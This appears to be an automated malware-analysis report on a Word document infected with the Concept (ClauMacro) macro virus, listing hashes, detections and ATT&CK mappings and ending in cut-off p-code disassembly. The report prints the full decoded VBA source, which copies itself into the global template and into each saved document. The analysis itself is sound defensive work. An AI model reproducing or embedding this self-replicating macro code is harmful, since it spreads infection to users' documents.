Concept — Office (OLE) malware analysis

Static analysis result for SHA-256 fae9cc8813c7a742…

MALICIOUS

Office (OLE)

Size: 41.0 KB
Created: 2000-01-01 22:05:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9c99c254ad2d7d45d8403d7d001de5e8
SHA-1: 89c30825d52191f4fa8eee41090443b6940bbd9a
SHA-256: fae9cc8813c7a742ea452297393203b6856146eee05512d9b9840ee228438fdb
Risk Score: 140

Malware Insights

Concept · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The critical ClamAV detection and high OLE_VBA_AUTOOPEN heuristic indicate a malicious document. The VBA macros within the 'macros.bas' script, specifically the 'FileSave' and 'ClauFS' subs, copy malicious macros like 'ClauAO', 'ClauFS', and 'Clau' to the global template, effectively infecting it. The 'Clau' macro displays a message box indicating a macro virus. This behavior is characteristic of the Concept virus family.

Heuristics 4

  • ClamAV: Doc.Trojan.Concept-28 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Concept-28
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8844 bytes
SHA-256: 26554fa6f7e34f8e4ada3010689f86bc3e1c75fe97f1623db7a6d9a5dba711bb
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Clau"

Public Sub MAIN()
Rem Este destul pentru a dovedi...
If WordBasic.Day(WordBasic.Now()) = 1 Then WordBasic.MsgBox "Felicitari! Aveti un Macro Virus!!!", "ClauMacro-001 Virus from Romania 1998", 64
End Sub

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Dim cMe$
Dim c2Macro$
'this becomes the FileSaveAs for the global template
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo bail
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
cMe$ = WordBasic.[FileName$]()
c2Macro$ = cMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauAO"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy "Global:ClauFS", c2Macro$
c2Macro$ = cMe$ + ":Clau"
WordBasic.MacroCopy "Global:Clau", c2Macro$
WordBasic.FileSaveAs dlg
WordBasic.Call "Clau"
GoTo done

bail:
If Err.Number <> 102 Then
    WordBasic.FileSaveAs dlg
End If
done:
End Sub

Attribute VB_Name = "ClauFS"

Public Sub MAIN()
Dim cMe$
Dim c2Macro$
'this becomes the FileSaveAs for the global template
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo bail
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
cMe$ = WordBasic.[FileName$]()
c2Macro$ = cMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauAO"
WordBasic.MacroCopy "Global:ClauAO", c2Macro$
c2Macro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy "Global:ClauFS", c2Macro$
c2Macro$ = cMe$ + ":Clau"
WordBasic.MacroCopy "Global:Clau", c2Macro$
WordBasic.FileSaveAs dlg
WordBasic.Call "Clau"
GoTo done

bail:
If Err.Number <> 102 Then
    WordBasic.FileSaveAs dlg
End If
done:
End Sub

Attribute VB_Name = "ClauAO"

Public Sub MAIN()
Dim cMe$
Dim cMacro$
On Error GoTo -1: On Error GoTo abort
'add FileSave and copies of AutoOpen and FileSave.
cMe$ = WordBasic.[FileName$]()
cMacro$ = cMe$ + ":Clau"
WordBasic.MacroCopy cMacro$, "Global:Clau"
cMacro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy cMacro$, "Global:FileSave"
cMacro$ = cMe$ + ":ClauFS"
WordBasic.MacroCopy cMacro$, "Global:ClauFS"
cMacro$ = cMe$ + ":ClauAO"
WordBasic.MacroCopy cMacro$, "Global:ClauAO"
WordBasic.Call "Clau"
abort:
End Sub

' Processing file: /opt/analyzer/scan_staging/767475e69bc64afd9f1333bb225a0612.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/Clau - 1171 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Rem 0x001F " Este destul pentru a dovedi..."
' Line #3:
' 	Ld WordBasic 
' 	ArgsMemLd Now 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd Day 0x0001 
' 	LitDI2 0x0001 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x0023 "Felicitari! Aveti un Macro Virus!!!"
' 	LitStr 0x0025 "ClauMacro-001 Virus from Romania 1998"
' 	LitDI2 0x0040 
' 	Ld WordBasic 
' 	ArgsMemCall MsgBox 0x0003 
' 	EndIf 
' Line #4:
' 	EndSub 
' Macros/VBA/FileSave - 2137 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub MAIN())
' Line #2:
' 	Dim 
' 	VarDefn cMe
' Line #3:
' 	Dim 
' 	VarDefn c2Macro
' Line #4:
' 	QuoteRem 0x0000 0x0033 "this becomes the FileSaveAs for the global template"
' Line #5:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileSaveAs 0x0001 
' 	Set dlg 
' Line #6:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError bail 
' Line #7:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #8:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall FileSaveAs 0x00
... (truncated)